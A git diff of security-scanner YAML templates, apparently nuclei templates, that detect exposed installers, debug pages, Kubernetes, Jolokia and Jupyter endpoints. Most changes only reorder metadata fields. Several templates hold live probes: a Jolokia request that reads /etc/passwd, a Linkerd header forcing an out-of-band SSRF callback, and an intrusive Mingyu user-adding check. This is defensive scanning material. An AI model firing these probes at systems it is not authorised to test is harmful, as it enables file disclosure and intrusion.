dfb04eaf79..e3499ac7f2 100644 --- a/http/misconfiguration/installer/sumowebtools-installer.yaml +++ b/http/misconfiguration/installer/sumowebtools-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"SumoWebTools Installer" tags: misconfig,sumowebtools,install,exposure diff --git a/http/misconfiguration/installer/tasmota-install.yaml b/http/misconfiguration/installer/tasmota-install.yaml index b3307862ea..124109dfdf 100644 --- a/http/misconfiguration/installer/tasmota-install.yaml +++ b/http/misconfiguration/installer/tasmota-install.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Tasmota" tags: misconfig,tasmota,install,exposure diff --git a/http/misconfiguration/installer/testrail-install.yaml b/http/misconfiguration/installer/testrail-install.yaml index fddace6e3a..feb7c23ff0 100644 --- a/http/misconfiguration/installer/testrail-install.yaml +++ b/http/misconfiguration/installer/testrail-install.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"TestRail Installation Wizard" tags: misconfig,testrail,install,exposure diff --git a/http/misconfiguration/installer/tiny-rss-installer.yaml b/http/misconfiguration/installer/tiny-rss-installer.yaml index cf8597d288..748b5c6c85 100644 --- a/http/misconfiguration/installer/tiny-rss-installer.yaml +++ b/http/misconfiguration/installer/tiny-rss-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Tiny Tiny RSS - Installer" tags: misconfig,tiny,install diff --git a/http/misconfiguration/installer/turbo-website-installer.yaml b/http/misconfiguration/installer/turbo-website-installer.yaml index e76ec30db6..9cce077a46 100644 --- a/http/misconfiguration/installer/turbo-website-installer.yaml +++ b/http/misconfiguration/installer/turbo-website-installer.yaml @@ -5,8 +5,8 @@ info: author: tess severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Turbo Website Reviewer" tags: turbo,misconfig,exposure,install diff --git a/http/misconfiguration/installer/typo3-installer.yaml b/http/misconfiguration/installer/typo3-installer.yaml index a22c225963..eea6b6df3f 100644 --- a/http/misconfiguration/installer/typo3-installer.yaml +++ b/http/misconfiguration/installer/typo3-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: medium metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Installing TYPO3 CMS" tags: misconfig,typo3,install diff --git a/http/misconfiguration/installer/umbraco-installer.yaml b/http/misconfiguration/installer/umbraco-installer.yaml index a968efdf31..4cc415e97b 100644 --- a/http/misconfiguration/installer/umbraco-installer.yaml +++ b/http/misconfiguration/installer/umbraco-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Install Umbraco" tags: misconfig,umbraco,install,oss diff --git a/http/misconfiguration/installer/unifi-wizard-install.yaml b/http/misconfiguration/installer/unifi-wizard-install.yaml index f1ce3569be..6ce3c889ff 100644 --- a/http/misconfiguration/installer/unifi-wizard-install.yaml +++ b/http/misconfiguration/installer/unifi-wizard-install.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"UniFi Wizard" tags: misconfig,install,unifi,exposure diff --git a/http/misconfiguration/installer/uvdesk-install.yaml b/http/misconfiguration/installer/uvdesk-install.yaml index 16603bf141..28cf5df021 100644 --- a/http/misconfiguration/installer/uvdesk-install.yaml +++ b/http/misconfiguration/installer/uvdesk-install.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"UVDesk Helpdesk Community Edition - Installation Wizard" tags: misconfig,uvdesk,install,exposure diff --git a/http/misconfiguration/installer/vironeer-installer.yaml b/http/misconfiguration/installer/vironeer-installer.yaml index 591a0f13c8..6232d3d9a1 100644 --- a/http/misconfiguration/installer/vironeer-installer.yaml +++ b/http/misconfiguration/installer/vironeer-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: icon_hash="1315386913" tags: misconfig,vironeer,install,exposure diff --git a/http/misconfiguration/installer/vtiger-installer.yaml b/http/misconfiguration/installer/vtiger-installer.yaml index e4d11b1156..f459517e2c 100644 --- a/http/misconfiguration/installer/vtiger-installer.yaml +++ b/http/misconfiguration/installer/vtiger-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Welcome to Vtiger CRM" tags: misconfig,vtiger,install,exposure diff --git a/http/misconfiguration/installer/webasyst-installer.yaml b/http/misconfiguration/installer/webasyst-installer.yaml index c84bf7530a..4b53abfc89 100644 --- a/http/misconfiguration/installer/webasyst-installer.yaml +++ b/http/misconfiguration/installer/webasyst-installer.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Webasyst Installer" tags: misconfig,webasyst,install,exposure diff --git a/http/misconfiguration/installer/webuzo-installer.yaml b/http/misconfiguration/installer/webuzo-installer.yaml index e575895e97..b215db3098 100644 --- a/http/misconfiguration/installer/webuzo-installer.yaml +++ b/http/misconfiguration/installer/webuzo-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Webuzo Installer" tags: misconfig,webuzo,install,exposure diff --git a/http/misconfiguration/installer/wp-install.yaml b/http/misconfiguration/installer/wp-install.yaml index ddd3c44603..32d4a41ce1 100644 --- a/http/misconfiguration/installer/wp-install.yaml +++ b/http/misconfiguration/installer/wp-install.yaml @@ -5,16 +5,16 @@ info: author: princechaddha,0xpugazh severity: critical description: Wordpress installation files have been detected + reference: + - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ + - https://twitter.com/0xPugazh/status/1610315762392268802 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H cvss-score: 9.4 cwe-id: CWE-284 - reference: - - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ - - https://twitter.com/0xPugazh/status/1610315762392268802 - tags: misconfig,panel,wordpress metadata: max-request: 1 + tags: misconfig,panel,wordpress http: - method: GET diff --git a/http/misconfiguration/installer/yzmcms-installer.yaml b/http/misconfiguration/installer/yzmcms-installer.yaml index 7652815bd2..10d7cf5aaf 100644 --- a/http/misconfiguration/installer/yzmcms-installer.yaml +++ b/http/misconfiguration/installer/yzmcms-installer.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"YzmCMS" fofa-query: title="YzmCMS" tags: misconfig,yzmcms,install,exposure diff --git a/http/misconfiguration/installer/zabbix-installer.yaml b/http/misconfiguration/installer/zabbix-installer.yaml index bcab879333..5fa21742e9 100644 --- a/http/misconfiguration/installer/zabbix-installer.yaml +++ b/http/misconfiguration/installer/zabbix-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:892542951 tags: misconfig,zabbix,install,exposure diff --git a/http/misconfiguration/installer/zencart-installer.yaml b/http/misconfiguration/installer/zencart-installer.yaml index b4fa8ef2ea..79a85ea014 100644 --- a/http/misconfiguration/installer/zencart-installer.yaml +++ b/http/misconfiguration/installer/zencart-installer.yaml @@ -7,10 +7,10 @@ info: reference: - https://www.zen-cart.com/ metadata: - max-request: 1 verified: true - fofa-query: title="Installer" && icon_hash="899320116" + max-request: 1 shodan-query: html:"shopping cart program by zen cart" + fofa-query: title="Installer" && icon_hash="899320116" tags: misconfig,zencart,install,exposure http: diff --git a/http/misconfiguration/installer/zenphoto-setup.yaml b/http/misconfiguration/installer/zenphoto-setup.yaml index a0a0bfc464..ca07b58402 100644 --- a/http/misconfiguration/installer/zenphoto-setup.yaml +++ b/http/misconfiguration/installer/zenphoto-setup.yaml @@ -10,8 +10,8 @@ info: cvss-score: 9.4 cwe-id: CWE-284 metadata: - max-request: 4 verified: true + max-request: 4 shodan-query: title:"Zenphoto install" tags: panel,zenphoto,setup,installer diff --git a/http/misconfiguration/internal-ip-disclosure.yaml b/http/misconfiguration/internal-ip-disclosure.yaml index 0c62bcf2dd..320cc518c4 100644 --- a/http/misconfiguration/internal-ip-disclosure.yaml +++ b/http/misconfiguration/internal-ip-disclosure.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://support.kemptechnologies.com/hc/en-us/articles/203522429-How-to-Mitigate-Against-Internal-IP-Address-Domain-Name-Disclosure-In-Real-Server-Redirect - tags: misconfig,disclosure metadata: max-request: 2 + tags: misconfig,disclosure http: - raw: @@ -23,6 +23,7 @@ http: stop-at-first-match: true unsafe: true # Use Unsafe HTTP library for malformed HTTP requests. + matchers-condition: and matchers: - type: regex diff --git a/http/misconfiguration/iot-vdme-simulator.yaml b/http/misconfiguration/iot-vdme-simulator.yaml index 8e6ba3e604..79801b91e7 100644 --- a/http/misconfiguration/iot-vdme-simulator.yaml +++ b/http/misconfiguration/iot-vdme-simulator.yaml @@ -11,8 +11,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"IoT vDME Simulator" tags: exposure,misconfig,panel @@ -23,6 +23,7 @@ http: - '{{BaseURL}}:9998' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/java-melody-exposed.yaml b/http/misconfiguration/java-melody-exposed.yaml index 04f67db7f0..f5f7891c71 100644 --- a/http/misconfiguration/java-melody-exposed.yaml +++ b/http/misconfiguration/java-melody-exposed.yaml @@ -4,14 +4,13 @@ info: name: JavaMelody Monitoring Exposed author: dhiyaneshDK,thomas_from_offensity severity: medium - description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to "View http sessions". - This can be used by an attacker to steal a user's session. + description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to "View http sessions". This can be used by an attacker to steal a user's session. reference: - https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/ - https://github.com/javamelody/javamelody/wiki/UserGuide#16-security - tags: config,java,javamelody,misconfig metadata: max-request: 2 + tags: config,java,javamelody,misconfig http: - method: GET @@ -24,6 +23,7 @@ http: - type: word words: - 'Monitoring JavaMelody on' + - type: status status: - 200 diff --git a/http/misconfiguration/jboss-status.yaml b/http/misconfiguration/jboss-status.yaml index fabc43e04c..cc8ceff0c5 100644 --- a/http/misconfiguration/jboss-status.yaml +++ b/http/misconfiguration/jboss-status.yaml @@ -10,11 +10,11 @@ info: - https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/6.4/html/administration_and_configuration_guide/sect-the_management_console classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 google-query: inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true tags: jboss,unauth,edb,misconfig diff --git a/http/misconfiguration/jboss-web-service.yaml b/http/misconfiguration/jboss-web-service.yaml index 4e4a6df353..fbc6b6816d 100644 --- a/http/misconfiguration/jboss-web-service.yaml +++ b/http/misconfiguration/jboss-web-service.yaml @@ -10,8 +10,8 @@ info: reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossWS.java metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"JBossWS" tags: jboss,misconfig diff --git a/http/misconfiguration/jenkins/jenkins-openuser-register.yaml b/http/misconfiguration/jenkins/jenkins-openuser-register.yaml index 0d89b9a467..944f493b53 100644 --- a/http/misconfiguration/jenkins/jenkins-openuser-register.yaml +++ b/http/misconfiguration/jenkins/jenkins-openuser-register.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.acunetix.com/vulnerabilities/web/jenkins-open-user-registration/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "X-Jenkins" tags: misconfig,jenkins,apache,tomcat diff --git a/http/misconfiguration/jetty-showcontexts-enable.yaml b/http/misconfiguration/jetty-showcontexts-enable.yaml index e1129c5b18..8cee6fb972 100644 --- a/http/misconfiguration/jetty-showcontexts-enable.yaml +++ b/http/misconfiguration/jetty-showcontexts-enable.yaml @@ -8,8 +8,8 @@ info: - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jetty-showcontexts-enable.yaml - https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"contexts known to this" tags: jetty,misconfig diff --git a/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml b/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml index 3f5e0f5df7..1125ec1c78 100644 --- a/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml +++ b/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml @@ -7,9 +7,9 @@ info: reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit - tags: jolokia,springboot,mbean,tomcat,misconfig metadata: max-request: 16 + tags: jolokia,springboot,mbean,tomcat,misconfig http: - method: GET diff --git a/http/misconfiguration/jolokia/jolokia-list.yaml b/http/misconfiguration/jolokia/jolokia-list.yaml index 88a589a2b3..a3a9ed621e 100644 --- a/http/misconfiguration/jolokia/jolokia-list.yaml +++ b/http/misconfiguration/jolokia/jolokia-list.yaml @@ -7,9 +7,9 @@ info: reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit - tags: jolokia,springboot,tomcat,misconfig metadata: max-request: 2 + tags: jolokia,springboot,tomcat,misconfig http: - method: GET @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/actuator/jolokia/list" stop-at-first-match: true + matchers-condition: and matchers: - type: status diff --git a/http/misconfiguration/jolokia/jolokia-mbean-search.yaml b/http/misconfiguration/jolokia/jolokia-mbean-search.yaml index 46610a30cd..921266ce69 100644 --- a/http/misconfiguration/jolokia/jolokia-mbean-search.yaml +++ b/http/misconfiguration/jolokia/jolokia-mbean-search.yaml @@ -7,9 +7,9 @@ info: reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit - tags: jolokia,springboot,mbean,tomcat,misconfig metadata: max-request: 2 + tags: jolokia,springboot,mbean,tomcat,misconfig http: - method: GET @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/actuator/jolokia/search/*:test=test" stop-at-first-match: true + matchers-condition: and matchers: - type: status diff --git a/http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml b/http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml index b27216bd8e..66e273f1de 100644 --- a/http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml +++ b/http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: jolokia,springboot,tomcat,lfi,misconfig metadata: max-request: 2 + tags: jolokia,springboot,tomcat,lfi,misconfig http: - method: GET @@ -23,9 +23,9 @@ http: - "{{BaseURL}}/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd" stop-at-first-match: true + matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/misconfiguration/jupyter-ipython-unauth.yaml b/http/misconfiguration/jupyter-ipython-unauth.yaml index f3c29158d7..3e1a9fdae9 100644 --- a/http/misconfiguration/jupyter-ipython-unauth.yaml +++ b/http/misconfiguration/jupyter-ipython-unauth.yaml @@ -6,12 +6,12 @@ info: severity: critical description: Jupyter was able to be accessed without authentication. classification: - cvss-score: 10.0 cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 cwe-id: CWE-288 - tags: unauth,jupyter,misconfig metadata: max-request: 1 + tags: unauth,jupyter,misconfig http: - method: GET @@ -23,6 +23,7 @@ http: - type: status status: - 200 + - type: word words: - ipython/static/components diff --git a/http/misconfiguration/jupyter-lab-unauth.yaml b/http/misconfiguration/jupyter-lab-unauth.yaml index d14c23b8ce..603e4ea154 100644 --- a/http/misconfiguration/jupyter-lab-unauth.yaml +++ b/http/misconfiguration/jupyter-lab-unauth.yaml @@ -9,8 +9,8 @@ info: reference: - https://paper.seebug.org/2058/ classification: - cvss-score: 10.0 cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 cwe-id: CWE-288 metadata: max-request: 1 diff --git a/http/misconfiguration/jupyter-notebooks-exposed.yaml b/http/misconfiguration/jupyter-notebooks-exposed.yaml index cd5fa00f33..9c6e492b89 100644 --- a/http/misconfiguration/jupyter-notebooks-exposed.yaml +++ b/http/misconfiguration/jupyter-notebooks-exposed.yaml @@ -18,6 +18,7 @@ http: host-redirects: true max-redirects: 1 + matchers-condition: and matchers: - type: status diff --git a/http/misconfiguration/kubeflow-dashboard-unauth.yaml b/http/misconfiguration/kubeflow-dashboard-unauth.yaml index 3cfefc8e41..eef0468039 100644 --- a/http/misconfiguration/kubeflow-dashboard-unauth.yaml +++ b/http/misconfiguration/kubeflow-dashboard-unauth.yaml @@ -6,14 +6,15 @@ info: severity: high reference: - https://github.com/kubeflow/kubeflow - tags: kubeflow,unauth,misconfig metadata: max-request: 1 + tags: kubeflow,unauth,misconfig http: - method: GET path: - '{{BaseURL}}/pipeline/apis/v1beta1/runs?page_size=5&sort_by=created_at%20desc' + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/kubernetes/kube-state-metrics.yaml b/http/misconfiguration/kubernetes/kube-state-metrics.yaml index 25b0a450ac..5548af371a 100644 --- a/http/misconfiguration/kubernetes/kube-state-metrics.yaml +++ b/http/misconfiguration/kubernetes/kube-state-metrics.yaml @@ -7,8 +7,8 @@ info: description: | An attacker can detect the public instance of a Kube-State-Metrics metrics. The Kubernetes API server exposes data about the count, health, and availability of pods, nodes, and other Kubernetes objects. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:Kube-state-metrics tags: misconfig,exposure,kube-state-metrics,k8s,kubernetes diff --git a/http/misconfiguration/kubernetes/kubernetes-metrics.yaml b/http/misconfiguration/kubernetes/kubernetes-metrics.yaml index 0a34a584e0..9705eba035 100644 --- a/http/misconfiguration/kubernetes/kubernetes-metrics.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-metrics.yaml @@ -7,9 +7,9 @@ info: description: Information Disclosure of Garbage Collection reference: - https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#metrics-in-kubernetes - tags: kubernetes,exposure,devops,misconfig metadata: max-request: 1 + tags: kubernetes,exposure,devops,misconfig http: - method: GET diff --git a/http/misconfiguration/kubernetes/kubernetes-pods.yaml b/http/misconfiguration/kubernetes/kubernetes-pods.yaml index 30830a9b94..94966859a8 100644 --- a/http/misconfiguration/kubernetes/kubernetes-pods.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-pods.yaml @@ -8,9 +8,9 @@ info: reference: - https://github.com/officialhocc/Kubernetes-Kubelet-RCE - https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/ - tags: k8,unauth,kubernetes,devops,misconfig metadata: max-request: 2 + tags: k8,unauth,kubernetes,devops,misconfig http: - method: GET diff --git a/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml b/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml index bb0dd8de6c..a9ca240e14 100644 --- a/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: medium description: Information Disclosure of Kubernetes Resource Report - tags: kubernetes,exposure,misconfig metadata: max-request: 1 + tags: kubernetes,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/kubernetes/unauth-etcd-server.yaml b/http/misconfiguration/kubernetes/unauth-etcd-server.yaml index f2eabd0eb8..75852c8817 100644 --- a/http/misconfiguration/kubernetes/unauth-etcd-server.yaml +++ b/http/misconfiguration/kubernetes/unauth-etcd-server.yaml @@ -6,12 +6,12 @@ info: severity: high description: | A Kubernetes etcd server stores the cluster secrets and configurations files. Anonymous access on etcd allows unauthenticated access the data without providing any authentication credentials. + remediation: https://etcd.io/docs/v2.3/authentication reference: - https://www.optiv.com/insights/source-zero/blog/kubernetes-attack-surface - remediation: https://etcd.io/docs/v2.3/authentication metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: product:"etcd" tags: tech,k8s,kubernetes,devops,etcd,unauth,anonymous,misconfig diff --git a/http/misconfiguration/laravel-debug-enabled.yaml b/http/misconfiguration/laravel-debug-enabled.yaml index d9a0151104..3ca176730b 100644 --- a/http/misconfiguration/laravel-debug-enabled.yaml +++ b/http/misconfiguration/laravel-debug-enabled.yaml @@ -8,9 +8,9 @@ info: Laravel with APP_DEBUG set to true is prone to show verbose errors. remediation: | Disable Laravel's debug mode by setting APP_DEBUG to false. - tags: debug,laravel,misconfig metadata: max-request: 1 + tags: debug,laravel,misconfig http: - method: GET diff --git a/http/misconfiguration/laravel-debug-error.yaml b/http/misconfiguration/laravel-debug-error.yaml index 6792fe9f93..236285b98e 100644 --- a/http/misconfiguration/laravel-debug-error.yaml +++ b/http/misconfiguration/laravel-debug-error.yaml @@ -4,9 +4,9 @@ info: name: Larvel Debug Method Enabled author: dhiyaneshDK severity: medium - tags: debug,laravel,misconfig metadata: max-request: 1 + tags: debug,laravel,misconfig http: - method: GET @@ -21,4 +21,4 @@ http: - type: status status: - - 500 \ No newline at end of file + - 500 diff --git a/http/misconfiguration/laravel-debug-infoleak.yaml b/http/misconfiguration/laravel-debug-infoleak.yaml index df48d96e7e..a1753b74a4 100644 --- a/http/misconfiguration/laravel-debug-infoleak.yaml +++ b/http/misconfiguration/laravel-debug-infoleak.yaml @@ -13,8 +13,8 @@ info: cvss-score: 6.5 cwe-id: CWE-215 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: Laravel-Framework fofa-query: app="Laravel-Framework" tags: misconfig,laravel,debug,infoleak diff --git a/http/misconfiguration/laravel-horizon-unauth.yaml b/http/misconfiguration/laravel-horizon-unauth.yaml index f0e052ce92..c0e53f8b9c 100644 --- a/http/misconfiguration/laravel-horizon-unauth.yaml +++ b/http/misconfiguration/laravel-horizon-unauth.yaml @@ -7,7 +7,7 @@ info: description: | Laravel Horizon Dashboard unauthenticated was detected. remediation: | - - Configure Authentication in Laravel Horizon. + - Configure Authentication in Laravel Horizon. reference: - https://github.com/laravel/horizon - https://laravel.com/docs/10.x/horizon#dashboard-authorization @@ -16,9 +16,9 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:450899026 - verified: true tags: laravel,unauth,dashboard,misconfig http: diff --git a/http/misconfiguration/libvirt-exporter-metrics.yaml b/http/misconfiguration/libvirt-exporter-metrics.yaml index 9202b6dd16..4a7a237d5e 100644 --- a/http/misconfiguration/libvirt-exporter-metrics.yaml +++ b/http/misconfiguration/libvirt-exporter-metrics.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Libvirt" tags: libvirt,exposure,debug,misconfig diff --git a/http/misconfiguration/liferay/liferay-api.yaml b/http/misconfiguration/liferay/liferay-api.yaml index 40f0ada3b8..4dc95dd188 100644 --- a/http/misconfiguration/liferay/liferay-api.yaml +++ b/http/misconfiguration/liferay/liferay-api.yaml @@ -4,11 +4,11 @@ info: name: Liferay /api/liferay - API Exposed author: DhiyaneshDk severity: info - metadata: - max-request: 1 - verified: true - shodan-query: title:"Liferay" reference: https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java + metadata: + verified: true + max-request: 1 + shodan-query: title:"Liferay" tags: liferay,exposure,api,misconfig http: diff --git a/http/misconfiguration/liferay/liferay-axis.yaml b/http/misconfiguration/liferay/liferay-axis.yaml index 8a22f20eb8..81350620eb 100644 --- a/http/misconfiguration/liferay/liferay-axis.yaml +++ b/http/misconfiguration/liferay/liferay-axis.yaml @@ -6,8 +6,8 @@ info: severity: info reference: https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Liferay" tags: misconfig,exposure,liferay,api diff --git a/http/misconfiguration/liferay/liferay-jsonws.yaml b/http/misconfiguration/liferay/liferay-jsonws.yaml index 7103a00be8..a839e17cb7 100644 --- a/http/misconfiguration/liferay/liferay-jsonws.yaml +++ b/http/misconfiguration/liferay/liferay-jsonws.yaml @@ -8,8 +8,8 @@ info: - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java - https://liferay.dev/blogs/-/blogs/securing-the-api-jsonws-ui?_com_liferay_blogs_web_portlet_BlogsPortlet_showFlags=true&scroll=_com_liferay_blogs_web_portlet_BlogsPortlet_discussionContainer metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Liferay" tags: liferay,exposure,api,misconfig diff --git a/http/misconfiguration/linkerd-ssrf-detect.yaml b/http/misconfiguration/linkerd-ssrf-detect.yaml index cd505c8314..92a346e73f 100644 --- a/http/misconfiguration/linkerd-ssrf-detect.yaml +++ b/http/misconfiguration/linkerd-ssrf-detect.yaml @@ -6,19 +6,19 @@ info: severity: high reference: - https://twitter.com/nirvana_msu/status/1084144955034165248 - tags: ssrf,linkerd,oast,misconfig metadata: max-request: 1 + tags: ssrf,linkerd,oast,misconfig http: - method: GET path: - "{{BaseURL}}" + headers: l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443 - matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" \ No newline at end of file + - "http" diff --git a/http/misconfiguration/linktap-gateway-exposure.yaml b/http/misconfiguration/linktap-gateway-exposure.yaml index 0869d4a2e4..9be0e06a26 100644 --- a/http/misconfiguration/linktap-gateway-exposure.yaml +++ b/http/misconfiguration/linktap-gateway-exposure.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"LinkTap Gateway" tags: misconfig,linktap,iot,exposure diff --git a/http/misconfiguration/locust-exposure.yaml b/http/misconfiguration/locust-exposure.yaml index 1bb8313957..b03e9f1657 100644 --- a/http/misconfiguration/locust-exposure.yaml +++ b/http/misconfiguration/locust-exposure.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: medium metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Locust" tags: exposure,locust,misconfig diff --git a/http/misconfiguration/lvm-exporter-metrics.yaml b/http/misconfiguration/lvm-exporter-metrics.yaml index 33c448eb6c..58af0c45bc 100644 --- a/http/misconfiguration/lvm-exporter-metrics.yaml +++ b/http/misconfiguration/lvm-exporter-metrics.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"LVM Exporter" tags: lvm,exposure,debug,misconfig diff --git a/http/misconfiguration/manage-engine-ad-search.yaml b/http/misconfiguration/manage-engine-ad-search.yaml index cafb7fea15..3e1eb40422 100644 --- a/http/misconfiguration/manage-engine-ad-search.yaml +++ b/http/misconfiguration/manage-engine-ad-search.yaml @@ -6,9 +6,9 @@ info: severity: high description: Manage Engine AD Manager service can be configured to allow anonymous users to browse the AD list remotely. metadata: + verified: true max-request: 1 shodan-query: title:"ManageEngine" - verified: true tags: unauth,misconfig http: @@ -21,6 +21,7 @@ http: - type: status status: - 200 + - type: word words: - "ManageEngine" diff --git a/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml b/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml index 0fe9125a39..1c275f2c2d 100644 --- a/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml +++ b/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml @@ -10,11 +10,10 @@ info: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/dbappsecurity-mingyu-xmlrpc-sock-adduser.yaml - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%AE%89%E6%81%92/%E5%AE%89%E6%81%92%20%E6%98%8E%E5%BE%A1%E8%BF%90%E7%BB%B4%E5%AE%A1%E8%AE%A1%E4%B8%8E%E9%A3%8E%E9%99%A9%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%BB%9F%20xmlrpc.sock%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: "明御运维审计与风险控制系统" tags: mingyu,xmlrpc,sock,intrusive,misconfig - variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/misconfiguration/misconfigured-concrete5.yaml 